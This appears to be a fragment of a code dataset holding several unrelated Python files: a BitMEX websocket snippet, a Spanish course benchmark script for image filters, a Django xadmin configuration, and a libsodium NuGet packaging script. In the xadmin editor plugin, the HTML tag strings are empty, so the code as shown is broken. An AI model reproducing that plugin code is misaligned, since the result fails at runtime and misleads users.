BitMEXWebsocket(endpoint='wss://www.bitmex.com/realtime', symbol='XBTUSD')\n last_bbo = None\n while True:\n new_bbo = a.order_book_l2.bbo()\n if new_bbo != last_bbo:\n last_bbo = new_bbo\n print(new_bbo)\n sleep(0.0001)\n","sub_path":"bitmex_tools/sockets/bitmex_socket_orderbookL2.py","file_name":"bitmex_socket_orderbookL2.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"372512388","text":"#!/usr/bin/env python3\nimport re\nimport statistics\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom termcolor import colored\nfrom libtest import *\n\nif not os.path.exists(TESTINDIR):\n print(colored('ERROR: Debe correr primero el script %s'%(PRIMER_SCRIPT), 'red'))\n exit()\n\n\n# Funciones para correr filtros y capturar salidas de pantalla para extraer mediciones...\n\ndef catedra_consola(filtro, implementacion, archivo_in, extra_params, salida_consola):\n salida_consola_a = subprocess.Popen([TP2ALU,filtro,\"-i\",implementacion,\"-o\",CATEDRADIR + \"/ \", archivo_in,extra_params],stdout=subprocess.PIPE)\n salida_consola_b = salida_consola_a.communicate()[0]\n salida_consola.append(salida_consola_b.decode('utf-8').strip())\n\ndef alumnos_consola(filtro, implementacion, archivo_in, extra_params, salida_consola):\n salida_consola_a = subprocess.Popen([TP2ALU,filtro,\"-i\",implementacion,\"-o\",CATEDRADIR + \"/ \", archivo_in,extra_params],stdout=subprocess.PIPE)\n salida_consola_b = salida_consola_a.communicate()[0]\n salida_consola.append(salida_consola_b.decode('utf-8').strip())\n\n\n\nCant_medidiones = 60 # Cantidad de mediciones por experimento\n\n\nnombre = ''\nOcultar_nombre = ''\nDescubrir_nombre = ''\n\nprint(colored('Se determinan archivos a testear...', 'blue'))\nimgs = archivos_tests()\nimgs.sort()\nimg0Prim = imgs[0:1]\nimg1PrimInd1 = len(imgs)/2\nimg1PrimInd2 = img1PrimInd1 + 1\nimg1Prim = imgs[int(img1PrimInd1):int(img1PrimInd2)]\n\nnombre = img0Prim[0]\nOcultar_nombre = img1Prim[0]\nDescubrir_nombre = img0Prim[0] + \".Ocultar.ASM.bmp\"\n\nprint(colored('Se realizan mediciones...', 'blue'))\n\n\n# Ocultar\n\nc___catedra_consola_Ocultar = []\nasm_alumnos_consola_Ocultar = []\n\nc___catedra_mediciones_Ocultar = []\nasm_alumnos_mediciones_Ocultar = []\n\n# Se ejecuta Ocultar (asm alumnos)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)) + ', Tamaño contenedor img1Prim = ' + str(len(img1Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Ocultar, implementación asm de alumnos sobre imagen ' + str(i) + ' ('+ img0Prim[i] + \", \" + img1Prim[i] + \") ... \" )\n alumnos_consola('Ocultar', 'asm', TESTINDIR + \"/\" + img0Prim[i], TESTINDIR + \"/\" + img1Prim[i], asm_alumnos_consola_Ocultar)\n\nprint('')\n\n# Se ejecuta Ocultar (c cátedra)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)) + ', Tamaño contenedor img1Prim = ' + str(len(img1Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Ocultar, implementación c de cátedra, sobre imagen ' + str(i) + ' (' + img0Prim[i] + \", \" + img1Prim[i] + \") ... \" )\n catedra_consola('Ocultar', 'c', TESTINDIR + \"/\" + img0Prim[i], TESTINDIR + \"/\" + img1Prim[i], c___catedra_consola_Ocultar)\n\n\n# Descubrir\n\nc___catedra_consola_Descubrir = []\nasm_alumnos_consola_Descubrir = []\n\nc___catedra_mediciones_Descubrir = []\nasm_alumnos_mediciones_Descubrir = []\n\n# Se ejecuta Descubrir (asm alumnos)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Descubrir, implementación asm de alumnos sobre imagen ' + str(i) + ' ('+ img0Prim[i] + \") ... 
\" )\n alumnos_consola('Descubrir', 'asm', CATEDRADIR + \"/\" + img0Prim[i] + \".Ocultar.ASM.bmp\", '', asm_alumnos_consola_Descubrir)\n\nprint('')\n\n# Se ejecuta Descubrir (c cátedra)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Descubrir, implementación c de cátedra, sobre imagen ' + str(i) + ' (' + img0Prim[i] + \") ... \" )\n catedra_consola('Descubrir', 'c', CATEDRADIR + \"/\" + img0Prim[i] + \".Ocultar.ASM.bmp\", '', c___catedra_consola_Descubrir)\n\n\n\n# Zigzag\n\nc___catedra_consola_Zigzag = []\nasm_alumnos_consola_Zigzag = []\n\nc___catedra_mediciones_Zigzag = []\nasm_alumnos_mediciones_Zigzag = []\n\n# Se ejecuta Zigzag (asm alumnos)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Zigzag, implementación asm de alumnos sobre imagen ' + str(i) + ' ('+ img0Prim[i] + \") ... \" )\n alumnos_consola('Zigzag', 'asm', TESTINDIR + \"/\" + img0Prim[i], '', asm_alumnos_consola_Zigzag)\n\nprint('')\n\n# Se ejecuta Zigzag (c cátedra)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Zigzag, implementación c de cátedra, sobre imagen ' + str(i) + ' (' + img0Prim[i] + \") ... \" )\n catedra_consola('Zigzag', 'c', TESTINDIR + \"/\" + img0Prim[i], '', c___catedra_consola_Zigzag)\n\n\n\nprint(colored('\\nSe listan salidas de consola capturadas...\\n', 'green'))\n\n\nprint(colored(\"\\nLecturas de consola Ocultar c catedra...\\n\", 'blue'))\nprint('\\n'.join(c___catedra_consola_Ocultar))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Ocultar asm alumnos...\\n\", 'blue'))\nprint('\\n'.join(asm_alumnos_consola_Ocultar))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Descubrir c catedra...\\n\", 'blue'))\nprint('\\n'.join(c___catedra_consola_Descubrir))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Descubrir asm alumnos...\\n\", 'blue'))\nprint('\\n'.join(asm_alumnos_consola_Descubrir))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Zigzag c catedra...\\n\", 'blue'))\nprint('\\n'.join(c___catedra_consola_Zigzag))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Zigzag asm alumnos...\\n\", 'blue'))\nprint('\\n'.join(asm_alumnos_consola_Zigzag))\nprint(\"\\n\")\n\n\n\nprint(colored('\\nSe extraen mediciones de salidas de consola capturadas y se las lista...\\n', 'green'))\n\n\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Ocultar c de cátedra sobre imágenes \" + nombre + \", \" + Ocultar_nombre + \"\\n\", 'blue'))\n\nfor i in range(len(c___catedra_consola_Ocultar)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',c___catedra_consola_Ocultar[i])\n c___catedra_mediciones_Ocultar.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nc___catedra_promedio_Ocultar = statistics.mean(c___catedra_mediciones_Ocultar)\nprint(\"Promedio = \" + str(c___catedra_promedio_Ocultar))\nc___catedra_desvioEs_Ocultar = statistics.stdev(c___catedra_mediciones_Ocultar)\nprint(\"Desvío estándar = \" + str(c___catedra_desvioEs_Ocultar))\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Ocultar asm de alumnos sobre imágenes \" + nombre + \", \" 
+ Ocultar_nombre + \"\\n\", 'blue'))\n\nfor i in range(len(asm_alumnos_consola_Ocultar)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',asm_alumnos_consola_Ocultar[i])\n asm_alumnos_mediciones_Ocultar.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nasm_alumnos_promedio_Ocultar = statistics.mean(asm_alumnos_mediciones_Ocultar)\nprint(\"Promedio = \" + str(asm_alumnos_promedio_Ocultar))\nasm_alumnos_desvioEs_Ocultar = statistics.stdev(asm_alumnos_mediciones_Ocultar)\nprint(\"Desvío estándar = \" + str(asm_alumnos_desvioEs_Ocultar))\n\n\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Descubrir c de cátedra sobre imagen \" + Descubrir_nombre + \"\\n\", 'blue'))\n\nfor i in range(len(c___catedra_consola_Descubrir)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',c___catedra_consola_Descubrir[i])\n c___catedra_mediciones_Descubrir.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nc___catedra_promedio_Descubrir = statistics.mean(c___catedra_mediciones_Descubrir)\nprint(\"Promedio = \" + str(c___catedra_promedio_Descubrir))\nc___catedra_desvioEs_Descubrir = statistics.stdev(c___catedra_mediciones_Descubrir)\nprint(\"Desvío estándar = \" + str(c___catedra_desvioEs_Descubrir))\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Descubrir asm de alumnos sobre imagen \" + Descubrir_nombre + \"\\n\", 'blue'))\n\nfor i in range(len(asm_alumnos_consola_Descubrir)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',asm_alumnos_consola_Descubrir[i])\n asm_alumnos_mediciones_Descubrir.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nasm_alumnos_promedio_Descubrir = statistics.mean(asm_alumnos_mediciones_Descubrir)\nprint(\"Promedio = \" + str(asm_alumnos_promedio_Descubrir))\nasm_alumnos_desvioEs_Descubrir = statistics.stdev(asm_alumnos_mediciones_Descubrir)\nprint(\"Desvío estándar = \" + str(asm_alumnos_desvioEs_Descubrir))\n\n\n\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Zigzag c de cátedra sobre imagen \" + nombre + \"\\n\", 'blue'))\n\nfor i in range(len(c___catedra_consola_Zigzag)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',c___catedra_consola_Zigzag[i])\n c___catedra_mediciones_Zigzag.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nc___catedra_promedio_Zigzag = statistics.mean(c___catedra_mediciones_Zigzag)\nprint(\"Promedio = \" + str(c___catedra_promedio_Zigzag))\nc___catedra_desvioEs_Zigzag = statistics.stdev(c___catedra_mediciones_Zigzag)\nprint(\"Desvío estándar = \" + str(c___catedra_desvioEs_Zigzag))\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Zigzag asm de alumnos sobre imagen \" + nombre + \"\\n\", 'blue'))\n\nfor i in range(len(asm_alumnos_consola_Zigzag)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',asm_alumnos_consola_Zigzag[i])\n asm_alumnos_mediciones_Zigzag.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nasm_alumnos_promedio_Zigzag = statistics.mean(asm_alumnos_mediciones_Zigzag)\nprint(\"Promedio = \" + str(asm_alumnos_promedio_Zigzag))\nasm_alumnos_desvioEs_Zigzag = statistics.stdev(asm_alumnos_mediciones_Zigzag)\nprint(\"Desvío estándar = \" + str(asm_alumnos_desvioEs_Zigzag))\n\n\n\n\nwith open('Medicion_Ocultar_catedra_' + Ocultar_nombre + \"_en_\" + 
nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Ocultar c de cátedra sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,c___catedra_mediciones_Ocultar)))\n archivo.write(\"\\nPromedio = \" + str(c___catedra_promedio_Ocultar))\n archivo.write(\"\\nDesvío estándar = \" + str(c___catedra_desvioEs_Ocultar))\n\nwith open('Medicion_Ocultar_alumnos_' + Ocultar_nombre + \"_en_\" + nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Ocultar asm de alumnos sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,asm_alumnos_mediciones_Ocultar)))\n archivo.write(\"\\nPromedio = \" + str(asm_alumnos_promedio_Ocultar))\n archivo.write(\"\\nDesvío estándar = \" + str(asm_alumnos_desvioEs_Ocultar))\n\n\nwith open('Medicion_Descubrir_catedra_' + Descubrir_nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Descubrir c de cátedra sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,c___catedra_mediciones_Descubrir)))\n archivo.write(\"\\nPromedio = \" + str(c___catedra_promedio_Descubrir))\n archivo.write(\"\\nDesvío estándar = \" + str(c___catedra_desvioEs_Descubrir))\n\nwith open('Medicion_Descubrir_alumnos_' + Descubrir_nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Descubrir asm de alumnos sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,asm_alumnos_mediciones_Descubrir)))\n archivo.write(\"\\nPromedio = \" + str(asm_alumnos_promedio_Descubrir))\n archivo.write(\"\\nDesvío estándar = \" + str(asm_alumnos_desvioEs_Descubrir))\n\n\nwith open('Medicion_Zigzag_catedra_' + nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Zigzag c de cátedra sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,c___catedra_mediciones_Zigzag)))\n archivo.write(\"\\nPromedio = \" + str(c___catedra_promedio_Zigzag))\n archivo.write(\"\\nDesvío estándar = \" + str(c___catedra_desvioEs_Zigzag))\n\nwith open('Medicion_Zigzag_alumnos_' + nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Zigzag asm de alumnos sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,asm_alumnos_mediciones_Zigzag)))\n archivo.write(\"\\nPromedio = \" + str(asm_alumnos_promedio_Zigzag))\n archivo.write(\"\\nDesvío estándar = \" + str(asm_alumnos_desvioEs_Zigzag))\n\n\n\n\nOcultar_EjeImplemt = ('C','ASM\\nsin\\noptimizar')\nOcultar_distribucion_Barras = np.arange(len(Ocultar_EjeImplemt))\nOcultar_EjeTiempoPromedio = []\nOcultar_EjeTiempoPromedio.append(c___catedra_promedio_Ocultar)\nOcultar_EjeTiempoPromedio.append(asm_alumnos_promedio_Ocultar)\nOcultar_EjeTiempoDesvioEs = []\nOcultar_EjeTiempoDesvioEs.append(c___catedra_desvioEs_Ocultar)\nOcultar_EjeTiempoDesvioEs.append(asm_alumnos_desvioEs_Ocultar)\n\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.barh(Ocultar_distribucion_Barras, Ocultar_EjeTiempoPromedio, xerr=Ocultar_EjeTiempoDesvioEs, align='center')\nplt.yticks(Ocultar_distribucion_Barras)\nax.set_yticklabels(Ocultar_EjeImplemt)\nax.invert_yaxis()\nfor i, v in enumerate(Ocultar_EjeTiempoPromedio):\n ax.text(v+3, i+.25, \"{:.2e}\".format(v) + \"\\n\" +chr(177) + \" \" + \"{:.2e}\".format(Ocultar_EjeTiempoDesvioEs[i])) #str(round(v,-3)) + \"\\n\" +chr(177) + \" \" + 
str(round(Ocultar_EjeTiempoDesvioEs[i],-3))\nax.set_xlim([0,1200000])\nplt.xlabel('Pulsos de reloj de CPU')\nplt.title('Tiempos de ejecución Ocultar\\n' + Ocultar_nombre + \" en \" + nombre)\nplt.savefig(\"Ocultar.\" + Ocultar_nombre + \".en.\" + nombre + \".jpg\")\n\n\n\n\n\nDescubrir_EjeImplemt = ('C','ASM\\nsin\\noptimizar')\nDescubrir_distribucion_Barras = np.arange(len(Descubrir_EjeImplemt))\nDescubrir_EjeTiempoPromedio = []\nDescubrir_EjeTiempoPromedio.append(c___catedra_promedio_Descubrir)\nDescubrir_EjeTiempoPromedio.append(asm_alumnos_promedio_Descubrir)\nDescubrir_EjeTiempoDesvioEs = []\nDescubrir_EjeTiempoDesvioEs.append(c___catedra_desvioEs_Descubrir)\nDescubrir_EjeTiempoDesvioEs.append(asm_alumnos_desvioEs_Descubrir)\n\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.barh(Descubrir_distribucion_Barras, Descubrir_EjeTiempoPromedio, xerr=Descubrir_EjeTiempoDesvioEs, align='center')\nplt.yticks(Descubrir_distribucion_Barras)\nax.set_yticklabels(Descubrir_EjeImplemt)\nax.invert_yaxis()\nfor i, v in enumerate(Descubrir_EjeTiempoPromedio):\n ax.text(v+3, i+.25, \"{:.2e}\".format(v) + \"\\n\" +chr(177) + \" \" + \"{:.2e}\".format(Descubrir_EjeTiempoDesvioEs[i])) #str(round(v,-3)) + \"\\n\" +chr(177) + \" \" + str(round(Descubrir_EjeTiempoDesvioEs[i],-3))\nax.set_xlim([0,1200000])\nplt.xlabel('Pulsos de reloj de CPU')\nplt.title('Tiempos de ejecución Descubrir\\n' + Descubrir_nombre)\nplt.savefig(\"Descubrir.\" + Descubrir_nombre + \".jpg\")\n\n\n\n\nZigzag_EjeImplemt = ('C','ASM\\nsin\\noptimizar')\nZigzag_distribucion_Barras = np.arange(len(Zigzag_EjeImplemt))\nZigzag_EjeTiempoPromedio = []\nZigzag_EjeTiempoPromedio.append(c___catedra_promedio_Zigzag)\nZigzag_EjeTiempoPromedio.append(asm_alumnos_promedio_Zigzag)\nZigzag_EjeTiempoDesvioEs = []\nZigzag_EjeTiempoDesvioEs.append(c___catedra_desvioEs_Zigzag)\nZigzag_EjeTiempoDesvioEs.append(asm_alumnos_desvioEs_Zigzag)\n\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.barh(Zigzag_distribucion_Barras, Zigzag_EjeTiempoPromedio, xerr=Zigzag_EjeTiempoDesvioEs, align='center')\nplt.yticks(Zigzag_distribucion_Barras)\nax.set_yticklabels(Zigzag_EjeImplemt)\nax.invert_yaxis()\nfor i, v in enumerate(Zigzag_EjeTiempoPromedio):\n ax.text(v+3, i+.25, \"{:.2e}\".format(v) + \"\\n\" +chr(177) + \" \" + \"{:.2e}\".format(Zigzag_EjeTiempoDesvioEs[i])) #str(round(v,-3)) + \"\\n\" +chr(177) + \" \" + str(round(Zigzag_EjeTiempoDesvioEs[i],-3))\nax.set_xlim([0,1200000])\nplt.xlabel('Pulsos de reloj de CPU')\nplt.title('Tiempos de ejecución Zigzag\\n' + nombre)\nplt.savefig(\"Zigzag.\" + nombre + \".jpg\")\n","sub_path":"tests/4_mediciones.py","file_name":"4_mediciones.py","file_ext":"py","file_size_in_byte":16388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"195568894","text":"import xadmin\n\n\nfrom .models import Post,Category,Tag\nfrom xadmin.views import BaseAdminPlugin,UpdateAdminView,CreateAdminView\n\nfrom xadmin import views\n\n\n\nclass BaseSetting(object):\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object): \n site_title = \"pyblog后台管理\" #设置头标题\n site_footer = \"pyblog 2018-2019\" #设置脚标题\n # menu_style = \"accordion\"\n\n\nxadmin.site.register(views.BaseAdminView, BaseSetting)\nxadmin.site.register(views.CommAdminView, GlobalSettings)\n\nclass CategoryVerifyRecord(object):\n list_display=['id','name']\n search_fields=['name']\n list_filter=['name']\n relfield_style = \"fk-select\"\n reversion_enable = True\n\nclass TagVerifyRecord(object):\n list_display=['id','name']\n search_fields=['name']\n list_filter=['name']\n relfield_style = \"fk-select\"\n reversion_enable = True\n\nclass PostVerifyRecord(object):\n list_display=['id','title','excerpt','views','category','modified_time']\n search_fields=['title','excerpt','views','category','modified_time']\n list_filter=['title','excerpt','category']\n relfield_style = \"fk-select\"\n reversion_enable = True\n\n \n\n\nclass SimditorPlugin(BaseAdminPlugin):\n\n def get_media(self,media):\n return media\n \n def block_extrahead(self,context,nodes):\n css=''\n css+=''%(self.static('blog/simeditor2.3.16/styles/simditor.css'))\n css+=''%(self.static('blog/simeditor2.3.16/styles/simditor-html.css'))\n css+=''%(self.static('blog/simeditor2.3.16/styles/simditor-markdown.css'))\n js='' % (self.static('blog/simeditor2.3.16/scripts/jquery.min.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/beautify-html.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/marked.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/to-markdown.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/module.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/hotkeys.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/uploader.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor-autosave.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor-html.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor-markdown.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor-textarea.js'))\n nodes.append(css+js)\n\nxadmin.site.register(Category,CategoryVerifyRecord)\nxadmin.site.register(Tag,TagVerifyRecord)\nxadmin.site.register(Post,PostVerifyRecord)\n\n#加入编辑器插件\nxadmin.site.register_plugin(SimditorPlugin,CreateAdminView)\nxadmin.site.register_plugin(SimditorPlugin,UpdateAdminView)","sub_path":"blog/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"503246958","text":"#!/usr/bin/python3\n\nimport datetime\nimport json\nimport os.path\nimport sys\nimport xml.etree.ElementTree as ET\n\n#\n# OUTPUT CONFIGURATION\n#\n\n# Package metadata\nNUPKG_ID = 'libsodium'\nNUPKG_VERSION = '1.0.11'\n\n# The names of the libsodium binaries in the package\nLIBSODIUM_DLL = 'libsodium.dll'\nLIBSODIUM_DYLIB = 'libsodium.dylib'\nLIBSODIUM_SO = 'libsodium.so'\n\n#\n# INPUT CONFIGURATION\n#\n\n# The archives to download\nWIN_FILE = 'libsodium-1.0.11-msvc.zip'\nDEB_FILE = 'libsodium18_1.0.11-1_amd64.deb'\nRPM_FILE = 'libsodium18-1.0.11-14.1.x86_64.rpm'\nOSX_FILE = 'libsodium-1.0.11.{0}.bottle.tar.gz'\n\n# The URLs of the archives\nOFFICIAL_URL = 'https://download.libsodium.org/libsodium/releases/{0}'\nOPENSUSE_URL = 'http://download.opensuse.org/repositories/home:/nsec/{0}/{1}/{2}'\nHOMEBREW_URL = 'https://bintray.com/homebrew/bottles/download_file?file_path={0}'\n\n# The files within the archives to extract\nWIN_LIB = '{0}/Release/v140/dynamic/libsodium.dll'\nDEB_LIB = './usr/lib/x86_64-linux-gnu/libsodium.so.18.1.1'\nRPM_LIB = './usr/lib64/libsodium.so.18.1.1'\nOSX_LIB = 'libsodium/1.0.11/lib/libsodium.18.dylib'\n\n# Commands to extract a file from an archive\nDEB_EXTRACT = 'ar -p {0} data.tar.xz | tar xJ \"{1}\"'\nRPM_EXTRACT = 'rpm2cpio {0} | cpio -i \"{1}\"'\nTAR_EXTRACT = 'tar xzf {0} \"{1}\"'\nZIP_EXTRACT = 'unzip {0} \"{1}\"'\n\n# The inputs\nINPUTS = [\n\n ( 'win10-x64',\n WIN_FILE,\n OFFICIAL_URL.format(WIN_FILE),\n WIN_LIB.format('x64'),\n ZIP_EXTRACT,\n LIBSODIUM_DLL),\n\n ( 'win10-x86',\n WIN_FILE,\n OFFICIAL_URL.format(WIN_FILE),\n WIN_LIB.format('Win32'),\n ZIP_EXTRACT,\n LIBSODIUM_DLL),\n\n ( 'debian.8-x64',\n DEB_FILE,\n OPENSUSE_URL.format('Debian_8.0', 'amd64', DEB_FILE),\n DEB_LIB,\n DEB_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'ubuntu.14.04-x64',\n DEB_FILE,\n OPENSUSE_URL.format('xUbuntu_14.04', 'amd64', DEB_FILE),\n DEB_LIB,\n DEB_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'ubuntu.16.04-x64',\n DEB_FILE,\n OPENSUSE_URL.format('xUbuntu_16.04', 'amd64', DEB_FILE),\n DEB_LIB,\n DEB_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'ubuntu.16.10-x64',\n DEB_FILE,\n OPENSUSE_URL.format('xUbuntu_16.10', 'amd64', DEB_FILE),\n DEB_LIB,\n DEB_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'centos.7-x64',\n RPM_FILE,\n OPENSUSE_URL.format('CentOS_7', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'fedora.23-x64',\n RPM_FILE,\n OPENSUSE_URL.format('Fedora_23', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'fedora.24-x64',\n RPM_FILE,\n OPENSUSE_URL.format('Fedora_24', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'fedora.25-x64',\n RPM_FILE,\n OPENSUSE_URL.format('Fedora_25', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'opensuse.42.1-x64',\n RPM_FILE,\n OPENSUSE_URL.format('openSUSE_Leap_42.1', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'opensuse.42.2-x64',\n RPM_FILE,\n OPENSUSE_URL.format('openSUSE_Leap_42.2', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'rhel.7-x64',\n RPM_FILE,\n OPENSUSE_URL.format('RHEL_7', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'osx.10.10-x64',\n OSX_FILE.format('yosemite'),\n HOMEBREW_URL.format(OSX_FILE.format('yosemite')),\n OSX_LIB,\n TAR_EXTRACT,\n LIBSODIUM_DYLIB),\n\n ( 'osx.10.11-x64',\n OSX_FILE.format('el_capitan'),\n HOMEBREW_URL.format(OSX_FILE.format('el_capitan')),\n OSX_LIB,\n TAR_EXTRACT,\n LIBSODIUM_DYLIB),\n\n ( 'osx.10.12-x64',\n OSX_FILE.format('sierra'),\n 
HOMEBREW_URL.format(OSX_FILE.format('sierra')),\n OSX_LIB,\n TAR_EXTRACT,\n LIBSODIUM_DYLIB),\n\n]\n\n# The version cookie\nCOOKIE_FILE = 'version.json'\n\n#\n# INTERMEDIATE FILES\n#\n\nCACHEDIR = 'cache'\nTEMPDIR = 'build'\n\n#\n# DO NOT EDIT BELOW THIS LINE\n#\n\nclass Item:\n def __init__(self, input, cachedir, tempdir):\n rid, archive, url, file, extract, lib = input\n\n self.rid = rid\n self.archive = archive\n self.url = url\n self.file = file\n self.extract = extract\n self.lib = lib\n\n self.cachefile = os.path.join(cachedir, rid, archive)\n self.sourcedir = os.path.join(tempdir, rid)\n self.sourcefile = os.path.join(tempdir, rid, os.path.normpath(file))\n self.targetfile = os.path.join('runtimes', rid, 'native', lib)\n\ndef create_nuspec(template, nuspec, version, items):\n tree = ET.parse(template)\n package = tree.getroot()\n metadata = package.find('metadata')\n metadata.find('version').text = version\n files = package.find('files')\n for item in items:\n ET.SubElement(files, 'file', src=item.sourcefile, target=item.targetfile).tail = '\\n'\n tree.write(nuspec, 'ascii', '')\n\ndef create_makefile(makefile, nupkg, nuspec, items):\n with open(makefile, 'w') as f:\n for item in items:\n f.write('FILES += {0}\\n'.format(item.sourcefile))\n f.write('\\n')\n f.write('{0}: {1} $(FILES)\\n\\tdotnet nuget pack $<\\n'.format(nupkg, nuspec))\n for item in items:\n f.write('\\n')\n f.write('{0}:\\n\\t@mkdir -p $(dir $@)\\n\\tcurl -f#Lo $@ \"{1}\"\\n'.format(item.cachefile, item.url))\n for item in items:\n f.write('\\n')\n f.write('{0}: {1}\\n\\t@mkdir -p $(dir $@)\\n\\tcd {2} && {3}\\n'.format(\n item.sourcefile,\n item.cachefile,\n item.sourcedir,\n item.extract.format(os.path.relpath(item.cachefile, item.sourcedir), item.file)))\n\ndef make_prerelease_version(version, suffix, cookie_file):\n cookies = dict()\n if os.path.isfile(cookie_file):\n with open(cookie_file, 'r') as f:\n cookies = json.load(f)\n cookie = cookies.get(suffix, '---').split('-')\n year, month, day, *rest = datetime.datetime.utcnow().timetuple()\n major = '{0:03}{1:02}'.format(year * 12 + month - 23956, day)\n minor = int(cookie[3]) + 1 if cookie[:3] == [version, suffix, major] else 1\n result = '{0}-{1}-{2}-{3:02}'.format(version, suffix, major, minor)\n cookies[suffix] = result\n with open(cookie_file, 'w') as f:\n json.dump(cookies, f, indent=4, sort_keys=True)\n return result\n\ndef main(args):\n if len(args) > 2 or len(args) > 1 and not args[1].isalpha():\n print('usage: {0} [label]'.format(os.path.basename(args[0])))\n sys.exit(1)\n\n version = NUPKG_VERSION\n\n if len(args) > 1:\n suffix = args[1].lower()\n else:\n 